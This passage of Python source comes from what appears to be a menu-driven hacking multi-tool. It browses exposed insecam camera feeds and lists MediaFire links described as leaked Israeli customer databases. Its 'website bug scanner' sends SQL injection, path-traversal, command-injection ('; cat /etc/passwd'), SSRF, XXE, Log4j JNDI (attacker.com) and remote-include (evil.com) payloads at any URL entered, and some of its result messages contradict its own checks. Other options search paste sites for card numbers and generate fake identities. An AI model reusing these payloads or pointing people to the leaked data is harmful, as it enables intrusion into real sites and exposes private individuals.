jsontags.append(i) 1444 | print(f"{White}[{Blue}{str(counter)}{White}] {i}") 1445 | counter += 1 1446 | place_choose = int(input((f"{White}[{Blue}+{White}] Choose the place : {Blue}"))) 1447 | 1448 | try: 1449 | r = requests.get('http://www.insecam.org/en/bytag/'+jsontags[place_choose]+'/', headers={ 1450 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1451 | 'Accept-Encoding': 'gzip, deflate', 1452 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1453 | 'Cache-Control': 'max-age=0', 1454 | 'Connection': 'keep-alive', 1455 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1456 | 'Host': 'www.insecam.org', 1457 | 'Upgrade-Insecure-Requests': '1', 1458 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36'}).text 1459 | except IndexError: 1460 | print(f"{Red}Place not found!{White}") 1461 | print(f"\n") 1462 | time.sleep(3) 1463 | monitor_cameras_places() 1464 | 1465 | s = r.split('pagenavigator("?page=",')[1] 1466 | next = s.split(',')[0] 1467 | next = int(next) 1468 | S = r.split('"thumbnail-item__wrap" href="') 1469 | counter = 1 1470 | for i in S: 1471 | Y = i.split('" ')[0] 1472 | if 'html' in Y: pass 1473 | else: 1474 | url = f'http://www.insecam.org{Y}' 1475 | print(f"{White}[{Blue}{counter}{White}] {Yellow}{url}") 1476 | counter += 1 1477 | 1478 | info = requests.get(url, headers={ 1479 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1480 | 'Accept-Encoding': 'gzip, deflate', 1481 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1482 | 'Cache-Control': 'max-age=0', 1483 | 'Connection': 'keep-alive', 1484 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1485 | 'Host': 'www.insecam.org', 1486 | 'Upgrade-Insecure-Requests': '1', 1487 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1488 | 1489 | for i in range(2, next): 1490 | url = f'http://www.insecam.org/en/bycountry/RS/?page={str(i)}' 1491 | r = requests.get(url, headers={ 1492 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', 1493 | 'Accept-Encoding': 'gzip, deflate', 1494 | 'Accept-Language': 'ar,en-US;q=0.9,en;q=0.8', 1495 | 'Cache-Control': 'max-age=0', 1496 | 'Connection': 'keep-alive', 1497 | 'Cookie': '_ga=GA1.1.1125454972.1667225132; __gads=ID=d4a85cd85ce2f539-223503ca84d60066:T=1667225145:RT=1667225145:S=ALNI_MZ4MsyAr2w4HGK_wzfy90dxfdFtng; __gpi=UID=00000b196cc62113:T=1667225145:RT=1667225145:S=ALNI_MZx4MzjOSuSbqPbJFNskKGifhu5zw; _ga_F7ZM4QYVCB=GS1.1.1667225132.1.1.1667226059.0.0.0', 1498 | 'Host': 'www.insecam.org', 1499 | 'Upgrade-Insecure-Requests': '1', 1500 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' }).text 1501 | 1502 | S = r.split('"thumbnail-item__wrap" href="') 1503 | counter = 1 1504 | for i in S: 1505 | Y = i.split('" ')[0] 1506 | if 'html' in Y: pass 1507 | else: 1508 | url = f'http://www.insecam.org{Y}' 1509 | print(f"{White}[{Blue}{counter}{White}] {Yellow}{url}") 1510 | counter += 1 1511 | monitor_cameras_places() 1512 | elif user_input == "99" or user_input == "Back" or user_input == "BACK" or user_input == "back": main_menu() 1513 | else: print(f"{Red}Please choose a correct option!") 1514 | elif selection == "14" or selection == "WebScraping" or selection == "WEbSCRAPING" or selection == "webscraping": 1515 | def extract_links_and_images(url): 1516 | response = requests.get(url) 1517 | soup = BeautifulSoup(response.text, 'html.parser') 1518 | links = [a.get('href') for a in soup.find_all('a', href=True)] 1519 | image_links = [img.get('src') for img in soup.find_all('img', src=True)] 1520 | return links, image_links 1521 | 1522 | url = input(f"{White}[{Blue}+{White}] - Enter the target URL : {Blue}") 1523 | 1524 | print(f"{White}WebScraping...") 1525 | time.sleep(3) 1526 | print(f"{White}[ WebScraping for {Blue}{url} {Green}✓{White} ]\n") 1527 | 1528 | links, image_links = extract_links_and_images(url) 1529 | 1530 | print(f"{White}Paths & Links :") 1531 | for link in links: 1532 | print(f" {link}") 1533 | 1534 | print(f"\n{White}Images :") 1535 | for link in image_links: 1536 | print(f" {link}") 1537 | 1538 | def download_images(image_links, save_dir): 1539 | save_images = input(f"\n{White}Do u want to save the images? ({Blue}Y{White}/{Blue}N{White}) {Blue}") 1540 | if save_images == "Y" or save_images == "y" or save_images == "Yes" or save_images == "yes" or save_images == "YES": 1541 | if not os.path.exists(save_dir): os.makedirs(save_dir) 1542 | 1543 | for i, link in enumerate(image_links): 1544 | if 'http' not in link: 1545 | link = url + link 1546 | response = requests.get(link) 1547 | with open(os.path.join(save_dir, f"img{i}.png"), 'wb') as f: 1548 | f.write(response.content) 1549 | 1550 | elif save_images == "N" or save_images == "n" or save_images == "No" or save_images == "no" or save_images == "No": another_operation() 1551 | else: 1552 | print(f"{Red}Please choose a correct option!{White}") 1553 | download_images(image_links, save_dir) 1554 | download_images(image_links, "Downloaded images") 1555 | elif selection == "15" or selection == "Get Http Cookies" or selection == "GET HTTP COOKIES" or selection == "get http Cookies": 1556 | target = input(f"{White}[{Blue}+{White}] Enter the target url : {Blue}") 1557 | 1558 | print(f"{White}Getting...") 1559 | time.sleep(3) 1560 | print(f"{White}[ Getting for {Blue}{target} {Green}✓{White} ]") 1561 | time.sleep(1) 1562 | 1563 | res = requests.get(target, cookies=CookieJar()) 1564 | cookies = res.cookies 1565 | 1566 | if cookies: 1567 | with open("Cookies.txt", "w") as f: 1568 | for cookie in cookies: 1569 | f.write(f"{cookie.name} = {cookie.value}") 1570 | print(f"\n[{Green}✓{White}] Cookies saved in {os.getcwd()}\Cookies") 1571 | else: print(f"\n{Yellow}There is nothing to save!") 1572 | elif selection == "16" or selection == "Israeli Databases" or selection == "ISRAELI DATABASES" or selection == "israeli databases": 1573 | table = Table(title=f"{White}Leaked Israeli db uploaded to the MediaFire platform.\n") 1574 | table.add_column("Link") 1575 | table.add_column("Description") 1576 | table.add_column("Size") 1577 | table.add_row("https://www.mediafire.com/file/l4o3yg0nehr0txv/1.csv/file", "Store room db containing 400K+ customers.", "86.6MB") 1578 | table.add_row("https://www.mediafire.com/file/2is34z1ekkhj2su/2.csv/file", "A commercial db containing 200k+ customers.", "23.2MB") 1579 | table.add_row("https://www.mediafire.com/file/63ib6s7o4rla335/3.csv/file", "A normal db contains 38K+ person.", "6.69MB") 1580 | table.add_row("https://www.mediafire.com/file/0ruazdhfg3pib51/Leaks.json/file", "Json file containing info of 521 Israeli companies.", "689KB") 1581 | Console().print(table, justify="left") 1582 | elif selection == "17" or selection == "Check Passwords Leakage" or selection == "CHECK PASSWORDS LEAKAGE" or selection == "check passwords leakage": 1583 | def check_password_leak(password): 1584 | sha1password = hashlib.sha1(password.encode('utf-8')).hexdigest().upper() 1585 | first5_char, tail = sha1password[:5], sha1password[5:] 1586 | url = f'https://api.pwnedpasswords.com/range/{first5_char}' 1587 | response = requests.get(url) 1588 | hashes = (line.split(':') for line in response.text.splitlines()) 1589 | for h, count in hashes: 1590 | if h == tail: return f"{White}[{Red}-{White}] {Red}The passwas leaked {count} times!" 1591 | return f"{White}[{Green}-{White}] {Green}The pass isn’t leaked." 1592 | 1593 | password = input(f"{White}[{Blue}+{White}] Enter the pass : {Blue}") 1594 | print(check_password_leak(password)) 1595 | elif selection == "18" or selection == "Scan Websites For Bugs" or selection == "SCAN WEBSITES FOR BUGS" or selection == "scan websites for bugs": 1596 | print(f"{Red}Warning : To avoid legal problems, seek permission from the website owner before scan.") 1597 | url = input(f"\n{White}[{Blue}+{White}] Enter the target website URL (ex: https://example.com) : {Blue}") 1598 | 1599 | results = [] 1600 | 1601 | def add_result(test_name, status, details, severity): 1602 | result = [test_name, status, details] 1603 | results.append(result) 1604 | 1605 | def server(url): 1606 | response = requests.get(url) 1607 | server = response.headers.get('Server') 1608 | if server: add_result("Server Info", f"{Cyan}Info{White}", f"{Cyan}The server is running {Blue}{server}{White}", "Info") 1609 | else: add_result("Server Info", f"{Cyan}Info{White}", f"{Yellow}No server info found in headers{White}", "Info") 1610 | try: 1611 | domain = url.split('//')[1].split('/')[0] 1612 | ip_address = socket.gethostbyname(domain) 1613 | add_result("IP", f"{Cyan}Info{White}", f"{Cyan}The IP of {Blue}{domain}{Cyan} is {Blue}{ip_address}{White}", "Info") 1614 | except socket.gaierror: add_result("IP", f"{Yellow}Error{White}", f"{Yellow}Could not resolve IP{White}", "High") 1615 | 1616 | def web_components(url): 1617 | response = requests.get(url) 1618 | soup = BeautifulSoup(response.text, 'html.parser') 1619 | scripts = soup.find_all('script') 1620 | if scripts: add_result("Script Tags", f"{Cyan}Info{White}", f"{Blue}Found {len(scripts)} script tags{White}", "Info") 1621 | else: add_result("Script Tags", f"{Cyan}Info{White}", f"{Yellow}Script tags not found{White}", "Info") 1622 | 1623 | def xss(url): 1624 | xss_payloads = [ 1625 | "", 1626 | "\">", 1627 | "'>"] 1628 | Bug = False 1629 | for payload in xss_payloads: 1630 | response = requests.get(url, params={'q': payload}) 1631 | if payload in response.text: 1632 | add_result("XSS/Cross Site Scripting", f"{Red}Bug{Red}", f"{Red}Payload : {payload}{White}", "High") 1633 | Bug = True 1634 | if not Bug: add_result("XSS/Cross Site Scripting", f"{Green}No bug{White}", f"{Green}No payloads were executed{White}", "Low") 1635 | 1636 | def sql_injection(url): 1637 | sql_payloads = [ 1638 | "' OR '1'='1", 1639 | "' OR '1'='1' --", 1640 | "' OR '1'='1' /*", 1641 | "' OR '1'='1' #"] 1642 | Bug = False 1643 | for payload in sql_payloads: 1644 | response = requests.get(url, params={'id': payload}) 1645 | if any(error in response.text for error in ["SQL syntax", "mysql", "syntax error", "unclosed quotation mark"]): 1646 | add_result("SQL Injection", f"{Red}Bug{White}", f"{Red}Payload : {payload}{White}", "High") 1647 | Bug = True 1648 | if not Bug: add_result("SQL Injection", f"{Green}No bug{White}", f"{Green}No payloads were executed{White}", "Low") 1649 | 1650 | def header_injection(url): 1651 | injection_payload = '">' 1652 | headers = {'User-Agent': injection_payload} 1653 | response = requests.get(url, headers=headers) 1654 | if injection_payload in response.text: add_result("Header Injection", f"{Red}Bug{White}", "Payload in User-Agent header", "High") 1655 | else: add_result("Header Injection", f"{Green}No bug{White}", f"{Green}Header Injection bug not found{White}", "Low") 1656 | 1657 | def idor(url): 1658 | response = requests.get(f"{url}/user/1") 1659 | if response.status_code == 200: add_result("IDOR (Insecure Direct Object Reference)", f"{Red}Bug{White}", "Able to access user data", "High") 1660 | else: add_result("IDOR (Insecure Direct Object Reference)", f"{Green}No bug{White}", f"{Green}IDOR bug not found{White}", "Low") 1661 | 1662 | def path_traversal(url): 1663 | traversal_payloads = [ 1664 | "../../etc/passwd", 1665 | "../../../../etc/passwd" ] 1666 | Bug = False 1667 | for payload in traversal_payloads: 1668 | response = requests.get(f"{url}/{payload}") 1669 | if "root:" in response.text: 1670 | add_result("Path Traversal", f"{Red}Bug{White}", f"{Red}Payload : {payload}{White}", "High") 1671 | Bug = True 1672 | if not Bug: add_result("Path Traversal", f"{Green}No bug{White}", f"{Green}Path Traversal bug not found{White}", "Low") 1673 | 1674 | def ssrf(url): 1675 | ssrf_payload = 'http://169.254.169.254/latest/meta-data/' 1676 | try: 1677 | response = requests.get(url, params={'url': ssrf_payload}) 1678 | if "instance-id" in response.text: add_result("SSRF (Server-Side Request Forgery)", f"{Red}Bug{White}", f"{Red}Payload: {ssrf_payload}{White}", "High") 1679 | else: add_result("SSRF (Server-Side Request Forgery)", f"{Green}No bug{White}", f"{Green}SSRF bug not found{White}", "Low") 1680 | except requests.exceptions.RequestException: add_result("SSRF", "Error", "Request failed", "High") 1681 | 1682 | def xxe(url): 1683 | xml_payload = """ 1684 | 1685 | ]> 1686 | &xxe;""" 1687 | headers = {'Content-Type': 'application/xml'} 1688 | response = requests.post(url, data=xml_payload, headers=headers) 1689 | if "root:x:0:0:" in response.text: add_result("XXE (XML External Entity)", f"{Red}Bug{White}", f"{Red}Able to read system files{White}", "High") 1690 | else: add_result("XXE (XML External Entity)", f"{Green}No bug{White}", f"{Green}XXE bug not found{White}", "Low") 1691 | 1692 | def rce(url): 1693 | rce_payload = "; cat /etc/passwd" 1694 | response = requests.get(f"{url}/?cmd={rce_payload}") 1695 | if "root:x:0:0:" in response.text: add_result("RCE (Remote Code Execution)/PHP Code Injection", f"{Red}Bug{White}", f"{Red}Able to execute arbitrary commands{White}", "High") 1696 | else: add_result("RCE (Remote Code Execution)/PHP Code Injection", f"{Green}No bug{White}", f"{Green}RCE bug not found{White}", "Low") 1697 | 1698 | def log4j(url): 1699 | log4j_payload = "${jndi:ldap://attacker.com/a}" 1700 | headers = {'User-Agent': log4j_payload} 1701 | response = requests.get(url, headers=headers) 1702 | if "java.naming.provider.url" in response.text: add_result("Log4j", f"{Red}Bug{White}", "Log4j bug not found", "High") 1703 | else: add_result("Log4j", f"{Green}No bug{White}", f"{Green}Log4j bug not found{White}", "Low") 1704 | 1705 | def lfi(url): 1706 | lfi_payload = "/etc/passwd" 1707 | response = requests.get(f"{url}?file={lfi_payload}") 1708 | if "root:x:0:0:" in response.text: add_result("LFI (Local File Include)", f"{Red}Bug{White}", "LFI bug not found", "High") 1709 | else: add_result("LFI (Local File Include)", f"{Green}No bug{White}", f"{Green}LFI bug not found{White}", "Low") 1710 | 1711 | def rfi(url): 1712 | rfi_payload = "http://evil.com/malicious.php" 1713 | response = requests.get(f"{url}?file={rfi_payload}") 1714 | if "malicious content" in response.text: add_result("RFI (Remote File Include)", f"{Red}Bug{White}", "RFI bug not found", "High") 1715 | else: add_result("RFI (Remote File Include)", f"{Green}No bug{White}", f"{Green}RFI bug not found{White}", "Low") 1716 | 1717 | def info_disclosure(url): 1718 | response = requests.get(url) 1719 | if any(keyword in response.text for keyword in ["password", "username", "secret"]): add_result("Info Disclosure", f"{Red}Bug{White}", f"{Red}Sensitive info disclosed{White}", "High") 1720 | else: add_result("Info Disclosure", f"{Green}No bug{White}", f"{Green}Sensitive info not found{White}", "Low") 1721 | 1722 | def unrestricted_resource_consumption(url): 1723 | large_payload = 'A' * 1000000 1724 | try: 1725 | response = requests.post(url, data={'input': large_payload}) 1726 | if response.status_code == 200: add_result("Unrestricted Resource Consumption", f"{Red}Bug{White}", f"{Red}Server accepts large payloads{White}", "High") 1727 | else: add_result("Unrestricted Resource Consumption", f"{Green}No bug{White}", f"{Green}unrestricted resource consumption bug not found{White}", "Low") 1728 | except requests.exceptions.RequestException: add_result("Unrestricted Resource Consumption", f"{Yellow}Error{White}", f"{Yellow}Request failed{White}", "High") 1729 | 1730 | def broken_authentication(url): 1731 | login_payload = {'username': 'admin', 'password': 'password'} 1732 | response = requests.post(f"{url}/login", data=login_payload) 1733 | if response.status_code == 200 and "Welcome" in response.text: add_result("Broken Authentication", f"{Red}Bug{White}", f"{Red}Default credentials work{White}", "High") 1734 | else: add_result("Broken Authentication", f"{Green}No bug{White}", f"{Green}broken authentication bug not found{White}", "Low") 1735 | 1736 | def bola(url): 1737 | test_object_id = "12345" 1738 | unauthorized_user_id = "67890" 1739 | response = requests.get(f"{url}/objects/{test_object_id}") 1740 | if unauthorized_user_id in response.text: add_result("BOLA", f"{Red}Bug{White}", f"{Red}Object accessed with ID : {unauthorized_user_id}{White}", "High") 1741 | else: add_result("BOLA", f"{Green}No bug{White}", f"{Green}BOLA bug not found{White}", "Low") 1742 | 1743 | def sensitive_info(url): 1744 | response = requests.get(url) 1745 | soup = BeautifulSoup(response.text, 'html.parser') 1746 | sensitive_keywords = ["password", "username", "admin", "secret"] 1747 | found = False 1748 | for keyword in sensitive_keywords: 1749 | if keyword in soup.text: 1750 | add_result("Sensitive Info", f"{Red}Bug{White}", f"{Red}Found keyword '{keyword}'{White}", "Medium") 1751 | found = True 1752 | if not found: add_result("Sensitive Info", f"{Green}Not Found{White}", f"{Green}Sensitive info not found{White}", "Low") 1753 | 1754 | def run_security_checks(url): 1755 | checks = [server, web_components, xss, sql_injection, header_injection, idor, path_traversal, ssrf, xxe, rce, log4j, lfi, rfi, info_disclosure, unrestricted_resource_consumption, broken_authentication, bola, sensitive_info] 1756 | 1757 | for check in checks: 1758 | check(url) 1759 | 1760 | print(f"{White}Scanning...") 1761 | 1762 | run_security_checks(url) 1763 | print(f"{White}[ Scan for {Blue}{url} {Green}✓{White} ]\n") 1764 | time.sleep(1) 1765 | 1766 | print(tabulate(results, headers=["Test", "Status", "Details"], tablefmt="grid")) 1767 | elif selection == "19" or selection == "Get MacAddress" or selection == "GET MACADDRESS" or selection == "get macaddress": 1768 | print(f"{White}Getting...") 1769 | time.sleep(3) 1770 | print(f"{White}[ Get for {Blue}{socket.gethostname()} {Green}✓{White} ]{Blue}") 1771 | time.sleep(1) 1772 | 1773 | try: os.system("getmac") 1774 | except BaseException as msg: print(f"{White}[{Red}-{White}] {Red}Error : {msg}{White}") 1775 | elif selection == "20" or selection == "Bank Cards OSINT" or selection == "BANK CARD OSINT" or selection == "bank card osint": 1776 | urls = [] 1777 | qlist = [] 1778 | total_url = [] 1779 | paste_sites = ["cl1p.net", "dpaste", "dumpz.org", "hastebin", "ideone", "pastebin", "pw.fabian-fingerle.de", "gist.github.com", "https://www.heypasteit.com/", "ivpaste.com", "mysticpaste.com", "paste.org.ru", "paste2.org", "sebsauvage.net/paste/", "slexy.org", "squadedit.com", "wklej.se", "textsnip.com"] 1780 | 1781 | card = input(f"{White}[{Blue}+{White}] Enter card number : {Blue}") 1782 | 1783 | print(f"{White}Searching...") 1784 | 1785 | try: 1786 | val = int(card) 1787 | if len(str(val)) >= 12 and len(str(val)) <= 19: 1788 | for site in paste_sites: 1789 | query = "{} {}".format(site, card) 1790 | qlist.append(query) 1791 | for entry in qlist: 1792 | for url in search(entry, pause=2.0, stop=20, user_agent="Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"): 1793 | urls.append(url) 1794 | 1795 | print(f"[ Search for {Blue}{card} {Green}✓{White} ]") 1796 | time.sleep(1) 1797 | 1798 | for item in urls: 1799 | for site in paste_sites: 1800 | if "{}".format(site) in item: 1801 | print(f"{White}[{Blue}-{White}] {item}") 1802 | total_url.append(item) 1803 | else: print(f"\n{Red}Invaild card number!") 1804 | total = len(total_url) 1805 | if total == 0: print(f"\n{White}[{Green}✓{White}] No leaks for this card number found.") 1806 | else: print(f"\n{White}[{Green}✓{White}] {str(total)} dumps found. ") 1807 | except ValueError: print(f"\n{Red}Invaild card number entered!") 1808 | elif selection == "21" or selection == "Scan Links For Malwares" or selection == "SCAN LINKS FOR MALWARES" or selection == "scan Links For Malwares": 1809 | malicious = 0 1810 | suspicious = 0 1811 | 1812 | link = input(f"{White}[{Blue}+{White}] Enter the link : {Blue}") 1813 | url = f"https://www.virustotal.com/ui/search?limit=20&relationships%5Bcomment%5D=author%2Citem&query={link}" 1814 | headers = { 1815 | "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", 1816 | "X-Tool": "vt-ui-main", 1817 | "X-VT-Anti-Abuse-Header": "MTA3OTM2NjUwMjctWkc5dWRDQmlaU0JsZG1scy0xNjMxMTE3NzQyLjY1", 1818 | "Accept-Ianguage": "en-US,en;q=0.9,es;q=0.8", } 1819 | try: 1820 | r = requests.get(url, headers=headers).json() 1821 | data = r['data'] 1822 | for names in data: 1823 | malicious = names['attributes']['last_analysis_stats']['malicious'] 1824 | suspicious = names['attributes']['last_analysis_stats'].get('suspicious', 0) 1825 | name = names['attributes']['last_analysis_results'] 1826 | for info in name: 1827 | result = name[info]['result'] 1828 | 1829 | if suspicious > 0: print(f"{White}[{Yellow}-{White}] Suspecious") 1830 | elif malicious > 0: print(f"{White}[{Red}-{White}] Virus!") 1831 | else: print(f"{White}[{Yellow}✓{White}] Clean") 1832 | except BaseException as msg: print(f"{Red}E: {msg}") 1833 | elif selection == "22" or selection == "Create Fake Personal Info" or selection == "CREATE FAKE PERSONAL INFO" or selection == "create fake personal info": 1834 | print(f"""{Blue}• {White}Arabic {{ 1835 | {White}[{Blue}1{White}] United Arab Emirates [ar_AE] 1836 | {White}[{Blue}2{White}] Bahrain [ar_BH] 1837 | {White}[{Blue}3{White}] Egypt [ar_EG] 1838 | {White}[{Blue}5{White}] Jordan [ar_JO] 1839 | {White}[{Blue}6{White}] Palestine [ar_PS] 1840 | {White}[{Blue}7{White}] Kingdom Of Suadi Arabia [ar_SA] }} 1841 | {Blue}• {White}Azerbaijani {{ {White}[{Blue}1{White}] Azerbaijan [ar_AZ] }} 1842 | {Blue}• {White}Bulgarian {{ 1843 | {White}[{Blue}1{White}] Bulgaria [bg_BG] 1844 | {White}[{Blue}2{White}] Bangladesh [bg_BD] 1845 | {White}[{Blue}3{White}] Bosnia and Herzegovina [bg_BA] }} 1846 | {Blue}• {White}Czech {{ {White}[{Blue}1{White}] Czech Republic [cs_CZ] }} 1847 | {Blue}• {White}Danish {{ {White}[{Blue}1{White}] Denmark [da_DK] }} 1848 | {Blue}• {White}German {{ 1849 | {White}[{Blue}1{White}] German Lang [de] 1850 | {White}[{Blue}2{White}] Austria [de_AT] 1851 | {White}[{Blue}3{White}] Switzerland [de_CH] 1852 | {White}[{Blue}4{White}] Germany [de_DE] 1853 | {White}[{Blue}5{White}] Denmark [de_DK] }} 1854 | {Blue}• {White}Greek {{ {White}[{Blue}1{White}] Greece [el_GR] }} 1855 | {Blue}• {White}English {{ 1856 | {White}[{Blue}01{White}] English Lang [en] 1857 | {White}[{Blue}02{White}] Australi [en_AU] 1858 | {White}[{White}03{White}] Bangladesh [en_BD] 1859 | {White}[{Blue}04{White}] Canada [en_CA] 1860 | {White}[{Blue}05{White}] United Kingdom [en_GB] 1861 | {White}[{Blue}06{White}] Ireland [en_IE] 1862 | {White}[{Blue}07{White}] Car [en_IN] 1863 | {White}[{Blue}08{White}] New Zealand [en_NZ] 1864 | {White}[{Blue}09{White}] Philippines [en_PH] 1865 | {White}[{Blue}10{White}] Thailand [en_TH] 1866 | {White}[{Blue}11{White}] United States [en_US] }} 1867 | {Blue}• {White}Spanish {{ 1868 | {White}[{Blue}1{White}] Spanish Lang [es] 1869 | {White}[{Blue}2{White}] Argentina [es_AR] 1870 | {White}[{Blue}3{White}] Canada [es_CA] 1871 | {White}[{Blue}4{White}] Chile [es_CL] 1872 | {White}[{Blue}5{White}] Colombia [es_CO] 1873 | {White}[{Blue}6{White}] Estonia [es_ES] 1874 | {White}[{Blue}7{White}] Mexico [es_MX] }} 1875 | {Blue}• {White}Estonian {{ {White}[{Blue}1{White}] Estonia [et_EE] }} 1876 | {Blue}• {White}Persian {{ {White}[{Blue}1{White}] Iran [fa_IR] }} 1877 | {Blue}• {White}Finnish {{ {White}[{Blue}1{White}] Finland [fi_FI] }} 1878 | {Blue}• {White}Philippines {{ {White}[{Blue}1{White}] Philippines [fil_PH] }} 1879 | {Blue}• {White}French {{ 1880 | {White}[{Blue}1{White}] Belgium [fr_BE] 1881 | {White}[{Blue}2{White}] Canada [fr_CA] 1882 | {White}[{Blue}3{White}] Switzerland [fr_CH] 1883 | {White}[{Blue}4{White}] France [fr_FR] 1884 | {White}[{Blue}5{White}] Quebec Canada [fr_QC] }} 1885 | {Blue}• {White}Irish {{ {White}[{Blue}1{White}] Ireland [ga_IE] }} 1886 | {Blue}• {White}Hebrew {{ {White}[{Blue}1{White}] Israel [he_IL] }} 1887 | {Blue}• {White}Hindi {{ {White}[{Blue}1{White}] Car [hi_IN] }} 1888 | {Blue}• {White}Hungarian {{ {White}[{Blue}1{White}] Croatia [hu_HU] }} 1889 | {Blue}• {White}Armenian {{ {White}[{Blue}1{White}] Armenia [hy_AM] }} 1890 | {Blue}• {White}Indonesian {{ {White}[{Blue}1{White}] Indonesia [id_ID] }} 1891 | {Blue}• {White}Italian {{ 1892 | {White}[{Blue}1{White}] Canada [it_CA] 1893 | {White}[{Blue}2{White}] Italy [it_IT] }} 1894 | {Blue}• {White}Japanese {{ {White}[{Blue}1{White}] Japan [ja_JP] }} 1895 | {Blue}• {White}Georgian {{ {White}[{Blue}1{White}] Georgia [ka_GE] }} 1896 | {Blue}• {White}Korean {{ {White}[{Blue}1{White}] Korea [ko_KR] }} 1897 | {Blue}• {White}Latin {{ {White}[{Blue}1{White}] Latin Lang [la] }} 1898 | {Blue}• {White}Luxembourgish {{ {White}[{Blue}1{White}] Luxembourg [lb_LU] }} 1899 | {Blue}• {White}Lithuanian {{ {White}[{Blue}1{White}] Lithuania [lt_LT] }} 1900 | {Blue}• {White}Latvian {{ {White}[{Blue}1{White}] Latvia [lv_LV] }} 1901 | {Blue}• {White}Maltese {{ {White}[{Blue}1{White}] Malta [mt_MT] }} 1902 | {Blue}• {White}Nepali {{ {White}[{Blue}1{White}] Nepal [ne_NP] }} 1903 | {Blue}• {White}Dutch {{ 1904 | {White}[{Blue}1{White}] Belgium [nl_BE] 1905 | {White}[{Blue}2{White}] Netherlands, Kingdom of the [nl_NL] }} 1906 | {Blue}• {White}Norsk {{ {White}[{Blue}1{White}] Norway [no_NO] }} 1907 | {Blue}• {White}Oriya {{ {White}[{Blue}1{White}] Car [or_IN] }} 1908 | {Blue}• {White}Polish {{ {White}[{Blue}1{White}] Poland [pl_PL] }} 1909 | {Blue}• {White}Portuguese {{ 1910 | {White}[{Blue}1{White}] Brazil [pt_BR] 1911 | {White}[{Blue}2{White}] Portugal [pt_PT] }} 1912 | {Blue}• {White}Romanian {{ {White}[{Blue}1{White}] Rome [ro_RO] }} 1913 | {Blue}• {White}Russian {{ {White}[{Blue}1{White}] Russia [ru_RU] }} 1914 | {Blue}• {White}Slovak {{ {White}[{Blue}1{White}] Slovakia [sk_SK] }} 1915 | {Blue}• {White}Slovenian {{ {White}[{Blue}1{White}] Slovenia [sl_SL] }} 1916 | {Blue}• {White}Albanian {{ {White}[{Blue}1{White}] Albania [sq_AL] }} 1917 | {Blue}• {White}Swedish {{ {White}[{Blue}1{White}] Sweden [sv_SE] }} 1918 | {Blue}• {White}Tamil {{ {White}[{Blue}1{White}] Car [ta_IN] }} 1919 | {Blue}• {White}Thai {{ 1920 | {White}[{Blue}1{White}] Thai Lang [th] 1921 | {White}[{Blue}2{White}] Thailand [th_TH] }} 1922 | {Blue}• {White}Tagalog {{ {White}[{Blue}1{White}] Philippines [tl_PH] }} 1923 | {Blue}• {White}Turkish {{ {White}[{Blue}1{White}] Türkiye [tr_TR] }} 1924 | {Blue}• {White}Twi {{ {White}[{Blue}1{White}] Ghana [tw_GH] }} 1925 | {Blue}• {White}Ukrainian {{ {White}[{Blue}1{White}] Ukraine [uk_UA] }} 1926 | {Blue}• {White}Vietnamese {{ {White}[{Blue}1{White}] Vietnam [vi_VN] }} 1927 | {Blue}• {White}Yorba {{ {White}[{Blue}1{White}] Nigeria [yo_NG] }} 1928 | {Blue}• {White}Chinese {{ 1929 | {White}[{Blue}1{White}] China [zh_CN] 1930 | {White}[{Blue}2{White}] Taiwan [zh_TW] 1931 | {White}[{Blue}3{White}] South Africa [zh_ZA] }}""") 1932 | 1933 | choose = input(f"{White}[{Blue}+{White}] Enter the lang & country code (ex: ar_SA) : {Blue}") 1934 | 1935 | lang_and_country_list = [ 1936 | "ar_AE", "ar_BH", "ar_EG", "ar_JO", "ar_PS", "ar_SA", "az_Az", "bg_BG", "bg_BD", "bg_BA", 1937 | "cs_CZ", "da_DK", "de", "de_AT", "de_CH", "de_DE", "de_DK", "el_GR", "en", "en_AU", 1938 | "en_BD", "en_CA", "en_GB", "en_IE", "en_IN", "en_NZ", "en_PH", "en_TH", "en_US", "es", 1939 | "es_AR", "es_CA", "es_CL", "es_CO", "es_ES", "es_MX", "et_EE", "fa_IR", "fi_FI", "fil_PH", 1940 | "fr_BE", "fr_CA", "fr_CH", "fr_FR", "fr_QC", "ga_IE", "he_IL", "hi_IN", "hu_HU", "hy_AM", 1941 | "id_ID", "it_CA", "it_IT", "ja_JP", "ka_GE", "ko_KR", "la", "lb_LU", "lt_LT", "lv_LV", 1942 | "mt_MT", "ne_NP", "nl_BE", "nl_NL", "no_NO", "or_IN", "pl_PL", "pt_BR", "pt_PT", "ro_RO", 1943 | "ru_RU", "sk_SK", "sl_SL", "sq_AL", "sv_SE", 